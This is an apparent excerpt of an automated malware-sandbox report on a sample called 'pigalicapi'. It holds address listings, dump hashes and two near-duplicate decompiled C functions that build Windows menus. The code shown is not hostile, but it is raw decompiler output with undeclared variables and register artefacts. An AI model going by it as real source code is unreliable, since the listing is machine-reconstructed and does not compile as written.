                                                                                                                                                                                                                                                                                          0x0080d23c
                                                                                                                                                                                                                                                                                          0x0080d24e
                                                                                                                                                                                                                                                                                          0x0080d25a
                                                                                                                                                                                                                                                                                          0x0080d268
                                                                                                                                                                                                                                                                                          0x0080d268
                                                                                                                                                                                                                                                                                          0x0080d270
                                                                                                                                                                                                                                                                                          0x0080d273
                                                                                                                                                                                                                                                                                          0x0080d276
                                                                                                                                                                                                                                                                                          0x0080d279
                                                                                                                                                                                                                                                                                          0x0080d27c
                                                                                                                                                                                                                                                                                          0x0080d284
                                                                                                                                                                                                                                                                                          0x0080d290
                                                                                                                                                                                                                                                                                          0x0080d290
                                                                                                                                                                                                                                                                                          0x0080d293
                                                                                                                                                                                                                                                                                          0x0080d298
                                                                                                                                                                                                                                                                                          0x0080d2aa
                                                                                                                                                                                                                                                                                          0x0080d2b6
                                                                                                                                                                                                                                                                                          0x0080d2b6
                                                                                                                                                                                                                                                                                          0x0080d2c1
                                                                                                                                                                                                                                                                                          0x0080d2c4
                                                                                                                                                                                                                                                                                          0x0080d2c7
                                                                                                                                                                                                                                                                                          0x0080d2cf
                                                                                                                                                                                                                                                                                          0x0080d2d6
                                                                                                                                                                                                                                                                                          0x0080d2df
                                                                                                                                                                                                                                                                                          0x0080d2e2
                                                                                                                                                                                                                                                                                          0x0080d2e2
                                                                                                                                                                                                                                                                                          0x0080d2f3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Rect$LongMessageSend$Invalidate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1214947677-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cc99c6177c07af1afe0b20bc9c0369b178353f3695bb4012ad8cd3f33c372fb7
                                                                                                                                                                                                                                                                                          • Instruction ID: efa20f9d3fdfc43b53018265221e14d2d7e2c02ca4b853211631be2c0a2efd0b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc99c6177c07af1afe0b20bc9c0369b178353f3695bb4012ad8cd3f33c372fb7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7731DB70A00705ABDB60DFA9DC89BAEB7F4FB48710F108619A519E7290DB74F940CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E00810147() {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed char _t83;
                                                                                                                                                                                                                                                                                          				int _t90;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t134;
                                                                                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          				int _t137;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t138;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                                          				CHAR* _t141;
                                                                                                                                                                                                                                                                                          				signed int _t142;
                                                                                                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0xe4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0xe0) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0xdc) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t142 - 0xd8)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t142 - 0xd4)) = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA(_t134, 0x417, _t137, _t142 - 0xe4);
                                                                                                                                                                                                                                                                                          					if(( *(_t142 - 0xdc) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t142 - 0xf4) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t142 - 0xf0)) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t142 - 0xec) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t142 - 0xe8)) = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA(_t134, 0x41d, _t137, _t142 - 0xf4);
                                                                                                                                                                                                                                                                                          						_t83 =  *(_t142 - 0xdc);
                                                                                                                                                                                                                                                                                          						_t127 =  *(_t142 - 0xec);
                                                                                                                                                                                                                                                                                          						_t110 = _t83 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          						if( *(_t142 - 0xec) >  *((intOrPtr*)(_t142 - 0xfc))) {
                                                                                                                                                                                                                                                                                          							if((_t83 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          								_push(0xc7);
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								 *(_t142 - 0xd0) = 0;
                                                                                                                                                                                                                                                                                          								_push(_t142 - 0xcf);
                                                                                                                                                                                                                                                                                          								if(( *(_t142 - 0x110))[2] == 0) {
                                                                                                                                                                                                                                                                                          									E00816820();
                                                                                                                                                                                                                                                                                          									_t145 = _t145 + 0xc;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x134)) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x120) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x11c) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x130)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x12c)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x128)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x124)) = 0;
                                                                                                                                                                                                                                                                                          									_t141 = _t142 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x138) = 0x20;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x134)) = 2;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x120) = _t141;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x11c) = 0xc8;
                                                                                                                                                                                                                                                                                          									if(SendMessageA(_t134, 0x441,  *(_t142 - 0xe0), _t142 - 0x138) == 0xffffffff || lstrlenA(_t141) == 0) {
                                                                                                                                                                                                                                                                                          										_t141 = 0x82293e;
                                                                                                                                                                                                                                                                                          										_t90 = LoadStringA( *0x880c0c,  *(_t142 - 0xe0), _t142 - 0xd0, 0xc8);
                                                                                                                                                                                                                                                                                          										_t118 = 0;
                                                                                                                                                                                                                                                                                          										if(_t90 > 0) {
                                                                                                                                                                                                                                                                                          											while( *((char*)(_t142 + _t118 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          												_t118 = _t118 + 1;
                                                                                                                                                                                                                                                                                          												if(_t118 < _t90) {
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L18;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t141 = _t142 + _t118 - 0xcf;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t142 - 0xe0);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t142 - 0x108), 0 | _t110 == 0x00000000,  *(_t142 - 0xe0), _t141);
                                                                                                                                                                                                                                                                                          									_t137 =  *(_t142 - 0x10c);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E00816820();
                                                                                                                                                                                                                                                                                          									E00816820(_t142 - 0x168, 0, 0x30);
                                                                                                                                                                                                                                                                                          									_t145 = _t145 + 0x18;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x168) = 0x30;
                                                                                                                                                                                                                                                                                          									if(E00804890(_t110, _t134, _t137) != 0) {
                                                                                                                                                                                                                                                                                          										 *(_t142 - 0x168) = 0x2c;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t142 - 0x164)) = 0x14;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x144) = _t142 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t142 - 0x140) = 0xc8;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA( *(_t142 - 0x118), _t137, 1, _t142 - 0x168);
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t142 - 0x108);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t142 - 0x108), 0 | _t110 == 0x00000000 | 0x00000010,  *(_t142 - 0x154),  *(_t142 - 0x144));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(GetMenuItemCount( *(_t142 - 0x108)) > 0) {
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t142 - 0x108), 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t137 = _t137 + 1;
                                                                                                                                                                                                                                                                                          					 *(_t142 - 0x10c) = _t137;
                                                                                                                                                                                                                                                                                          				} while (_t137 <  *((intOrPtr*)(_t142 - 0x114)));
                                                                                                                                                                                                                                                                                          				_t138 =  *(_t142 - 0x108);
                                                                                                                                                                                                                                                                                          				if(GetMenuItemCount(_t138) != 0) {
                                                                                                                                                                                                                                                                                          					_pop(_t135);
                                                                                                                                                                                                                                                                                          					 *( *(_t142 - 0x110)) = _t138;
                                                                                                                                                                                                                                                                                          					_pop(_t139);
                                                                                                                                                                                                                                                                                          					_pop(_t106);
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t106,  *(_t142 - 4) ^ _t142,  *(_t142 - 0x110), _t135, _t139);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t138 != 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t138);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          					_pop(_t136);
                                                                                                                                                                                                                                                                                          					_pop(_t140);
                                                                                                                                                                                                                                                                                          					_pop(_t107);
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t107,  *(_t142 - 4) ^ _t142, _t127, _t136, _t140);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x00810150
                                                                                                                                                                                                                                                                                          0x00810158
                                                                                                                                                                                                                                                                                          0x0081015e
                                                                                                                                                                                                                                                                                          0x00810164
                                                                                                                                                                                                                                                                                          0x0081016a
                                                                                                                                                                                                                                                                                          0x00810170
                                                                                                                                                                                                                                                                                          0x00810184
                                                                                                                                                                                                                                                                                          0x0081018d
                                                                                                                                                                                                                                                                                          0x008101a3
                                                                                                                                                                                                                                                                                          0x008101a9
                                                                                                                                                                                                                                                                                          0x008101af
                                                                                                                                                                                                                                                                                          0x008101b5
                                                                                                                                                                                                                                                                                          0x008101bb
                                                                                                                                                                                                                                                                                          0x008101bd
                                                                                                                                                                                                                                                                                          0x008101c3
                                                                                                                                                                                                                                                                                          0x008101ce
                                                                                                                                                                                                                                                                                          0x008101d7
                                                                                                                                                                                                                                                                                          0x008101e0
                                                                                                                                                                                                                                                                                          0x0081021c
                                                                                                                                                                                                                                                                                          0x00810227
                                                                                                                                                                                                                                                                                          0x00810229
                                                                                                                                                                                                                                                                                          0x00810230
                                                                                                                                                                                                                                                                                          0x00810231
                                                                                                                                                                                                                                                                                          0x008102ce
                                                                                                                                                                                                                                                                                          0x008102d5
                                                                                                                                                                                                                                                                                          0x008102d8
                                                                                                                                                                                                                                                                                          0x008102de
                                                                                                                                                                                                                                                                                          0x008102e4
                                                                                                                                                                                                                                                                                          0x008102f1
                                                                                                                                                                                                                                                                                          0x008102f7
                                                                                                                                                                                                                                                                                          0x008102fd
                                                                                                                                                                                                                                                                                          0x00810303
                                                                                                                                                                                                                                                                                          0x00810310
                                                                                                                                                                                                                                                                                          0x0081031e
                                                                                                                                                                                                                                                                                          0x00810328
                                                                                                                                                                                                                                                                                          0x00810332
                                                                                                                                                                                                                                                                                          0x00810338
                                                                                                                                                                                                                                                                                          0x0081034b
                                                                                                                                                                                                                                                                                          0x00810374
                                                                                                                                                                                                                                                                                          0x00810379
                                                                                                                                                                                                                                                                                          0x0081037f
                                                                                                                                                                                                                                                                                          0x00810383
                                                                                                                                                                                                                                                                                          0x00810385
                                                                                                                                                                                                                                                                                          0x0081038f
                                                                                                                                                                                                                                                                                          0x00810392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810392
                                                                                                                                                                                                                                                                                          0x00810396
                                                                                                                                                                                                                                                                                          0x00810396
                                                                                                                                                                                                                                                                                          0x00810383
                                                                                                                                                                                                                                                                                          0x0081039d
                                                                                                                                                                                                                                                                                          0x0081039d
                                                                                                                                                                                                                                                                                          0x008103b4
                                                                                                                                                                                                                                                                                          0x008103ba
                                                                                                                                                                                                                                                                                          0x00810237
                                                                                                                                                                                                                                                                                          0x00810237
                                                                                                                                                                                                                                                                                          0x00810247
                                                                                                                                                                                                                                                                                          0x0081024c
                                                                                                                                                                                                                                                                                          0x0081024f
                                                                                                                                                                                                                                                                                          0x00810260
                                                                                                                                                                                                                                                                                          0x00810262
                                                                                                                                                                                                                                                                                          0x00810262
                                                                                                                                                                                                                                                                                          0x00810283
                                                                                                                                                                                                                                                                                          0x0081028d
                                                                                                                                                                                                                                                                                          0x00810293
                                                                                                                                                                                                                                                                                          0x0081029d
                                                                                                                                                                                                                                                                                          0x008102b7
                                                                                                                                                                                                                                                                                          0x008102c3
                                                                                                                                                                                                                                                                                          0x008102c3
                                                                                                                                                                                                                                                                                          0x008101e2
                                                                                                                                                                                                                                                                                          0x008101f1
                                                                                                                                                                                                                                                                                          0x00810207
                                                                                                                                                                                                                                                                                          0x00810207
                                                                                                                                                                                                                                                                                          0x008101f1
                                                                                                                                                                                                                                                                                          0x008101e0
                                                                                                                                                                                                                                                                                          0x008101d7
                                                                                                                                                                                                                                                                                          0x008103c0
                                                                                                                                                                                                                                                                                          0x008103c1
                                                                                                                                                                                                                                                                                          0x008103c7
                                                                                                                                                                                                                                                                                          0x008103d3
                                                                                                                                                                                                                                                                                          0x008103e2
                                                                                                                                                                                                                                                                                          0x00810413
                                                                                                                                                                                                                                                                                          0x00810414
                                                                                                                                                                                                                                                                                          0x00810416
                                                                                                                                                                                                                                                                                          0x0081041b
                                                                                                                                                                                                                                                                                          0x00810424
                                                                                                                                                                                                                                                                                          0x008103e4
                                                                                                                                                                                                                                                                                          0x008103e6
                                                                                                                                                                                                                                                                                          0x008103e9
                                                                                                                                                                                                                                                                                          0x008103e9
                                                                                                                                                                                                                                                                                          0x008103f1
                                                                                                                                                                                                                                                                                          0x008103f9
                                                                                                                                                                                                                                                                                          0x008103fa
                                                                                                                                                                                                                                                                                          0x008103fb
                                                                                                                                                                                                                                                                                          0x00810409
                                                                                                                                                                                                                                                                                          0x00810409

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$ItemMessage$AppendCountSend_memset$BeepDestroyInfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2301784159-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 40ca3b0144595aa0b02633f6924d93662cffc0ebe0da8e244e08d0fa5915a408
                                                                                                                                                                                                                                                                                          • Instruction ID: e7e6ace0be2a5e5072f2c9e530b63c879bf4062f9515b50c8e785eba18b5e6a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40ca3b0144595aa0b02633f6924d93662cffc0ebe0da8e244e08d0fa5915a408
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16212C71E412699FDB60CB64CD45BDEB7B8FF19700F1081DAA54DF6241D6B05AC18F60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E00810149() {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed char _t83;
                                                                                                                                                                                                                                                                                          				int _t90;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t134;
                                                                                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          				int _t137;
                                                                                                                                                                                                                                                                                          				int _t138;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t139;
                                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                                          				CHAR* _t142;
                                                                                                                                                                                                                                                                                          				signed int _t143;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0xe4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0xe0) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0xdc) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t143 - 0xd8)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t143 - 0xd4)) = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA(_t134, 0x417, _t137, _t143 - 0xe4);
                                                                                                                                                                                                                                                                                          					if(( *(_t143 - 0xdc) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t143 - 0xf4) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t143 - 0xf0)) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t143 - 0xec) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t143 - 0xe8)) = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA(_t134, 0x41d, _t137, _t143 - 0xf4);
                                                                                                                                                                                                                                                                                          						_t83 =  *(_t143 - 0xdc);
                                                                                                                                                                                                                                                                                          						_t127 =  *(_t143 - 0xec);
                                                                                                                                                                                                                                                                                          						_t110 = _t83 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          						if( *(_t143 - 0xec) >  *((intOrPtr*)(_t143 - 0xfc))) {
                                                                                                                                                                                                                                                                                          							if((_t83 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          								_push(0xc7);
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								 *(_t143 - 0xd0) = 0;
                                                                                                                                                                                                                                                                                          								_push(_t143 - 0xcf);
                                                                                                                                                                                                                                                                                          								if(( *(_t143 - 0x110))[2] == 0) {
                                                                                                                                                                                                                                                                                          									E00816820();
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x134)) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x120) = 0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x11c) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x130)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x12c)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x128)) = 0;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x124)) = 0;
                                                                                                                                                                                                                                                                                          									_t142 = _t143 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x138) = 0x20;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x134)) = 2;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x120) = _t142;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x11c) = 0xc8;
                                                                                                                                                                                                                                                                                          									if(SendMessageA(_t134, 0x441,  *(_t143 - 0xe0), _t143 - 0x138) == 0xffffffff || lstrlenA(_t142) == 0) {
                                                                                                                                                                                                                                                                                          										_t142 = 0x82293e;
                                                                                                                                                                                                                                                                                          										_t90 = LoadStringA( *0x880c0c,  *(_t143 - 0xe0), _t143 - 0xd0, 0xc8);
                                                                                                                                                                                                                                                                                          										_t118 = 0;
                                                                                                                                                                                                                                                                                          										if(_t90 > 0) {
                                                                                                                                                                                                                                                                                          											while( *((char*)(_t143 + _t118 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          												_t118 = _t118 + 1;
                                                                                                                                                                                                                                                                                          												if(_t118 < _t90) {
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L18;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t142 = _t143 + _t118 - 0xcf;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t143 - 0xe0);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t143 - 0x108), 0 | _t110 == 0x00000000,  *(_t143 - 0xe0), _t142);
                                                                                                                                                                                                                                                                                          									_t137 =  *(_t143 - 0x10c);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E00816820();
                                                                                                                                                                                                                                                                                          									E00816820(_t143 - 0x168, 0, 0x30);
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x168) = 0x30;
                                                                                                                                                                                                                                                                                          									if(E00804890(_t110, _t134, _t137) != 0) {
                                                                                                                                                                                                                                                                                          										 *(_t143 - 0x168) = 0x2c;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t143 - 0x164)) = 0x14;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x144) = _t143 - 0xd0;
                                                                                                                                                                                                                                                                                          									 *(_t143 - 0x140) = 0xc8;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA( *(_t143 - 0x118), _t137, 1, _t143 - 0x168);
                                                                                                                                                                                                                                                                                          									_t127 =  *(_t143 - 0x108);
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t143 - 0x108), 0 | _t110 == 0x00000000 | 0x00000010,  *(_t143 - 0x154),  *(_t143 - 0x144));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(GetMenuItemCount( *(_t143 - 0x108)) > 0) {
                                                                                                                                                                                                                                                                                          									AppendMenuA( *(_t143 - 0x108), 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t138 = _t137 + 1;
                                                                                                                                                                                                                                                                                          					 *(_t143 - 0x10c) = _t138;
                                                                                                                                                                                                                                                                                          				} while (_t138 <  *((intOrPtr*)(_t143 - 0x114)));
                                                                                                                                                                                                                                                                                          				_t139 =  *(_t143 - 0x108);
                                                                                                                                                                                                                                                                                          				if(GetMenuItemCount(_t139) != 0) {
                                                                                                                                                                                                                                                                                          					_pop(_t135);
                                                                                                                                                                                                                                                                                          					 *( *(_t143 - 0x110)) = _t139;
                                                                                                                                                                                                                                                                                          					_pop(_t140);
                                                                                                                                                                                                                                                                                          					_pop(_t106);
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t106,  *(_t143 - 4) ^ _t143,  *(_t143 - 0x110), _t135, _t140);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t139 != 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t139);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          					_pop(_t136);
                                                                                                                                                                                                                                                                                          					_pop(_t141);
                                                                                                                                                                                                                                                                                          					_pop(_t107);
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t107,  *(_t143 - 4) ^ _t143, _t127, _t136, _t141);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x00810150
                                                                                                                                                                                                                                                                                          0x00810158
                                                                                                                                                                                                                                                                                          0x0081015e
                                                                                                                                                                                                                                                                                          0x00810164
                                                                                                                                                                                                                                                                                          0x0081016a
                                                                                                                                                                                                                                                                                          0x00810170
                                                                                                                                                                                                                                                                                          0x00810184
                                                                                                                                                                                                                                                                                          0x0081018d
                                                                                                                                                                                                                                                                                          0x008101a3
                                                                                                                                                                                                                                                                                          0x008101a9
                                                                                                                                                                                                                                                                                          0x008101af
                                                                                                                                                                                                                                                                                          0x008101b5
                                                                                                                                                                                                                                                                                          0x008101bb
                                                                                                                                                                                                                                                                                          0x008101bd
                                                                                                                                                                                                                                                                                          0x008101c3
                                                                                                                                                                                                                                                                                          0x008101ce
                                                                                                                                                                                                                                                                                          0x008101d7
                                                                                                                                                                                                                                                                                          0x008101e0
                                                                                                                                                                                                                                                                                          0x0081021c
                                                                                                                                                                                                                                                                                          0x00810227
                                                                                                                                                                                                                                                                                          0x00810229
                                                                                                                                                                                                                                                                                          0x00810230
                                                                                                                                                                                                                                                                                          0x00810231
                                                                                                                                                                                                                                                                                          0x008102ce
                                                                                                                                                                                                                                                                                          0x008102d8
                                                                                                                                                                                                                                                                                          0x008102de
                                                                                                                                                                                                                                                                                          0x008102e4
                                                                                                                                                                                                                                                                                          0x008102f1
                                                                                                                                                                                                                                                                                          0x008102f7
                                                                                                                                                                                                                                                                                          0x008102fd
                                                                                                                                                                                                                                                                                          0x00810303
                                                                                                                                                                                                                                                                                          0x00810310
                                                                                                                                                                                                                                                                                          0x0081031e
                                                                                                                                                                                                                                                                                          0x00810328
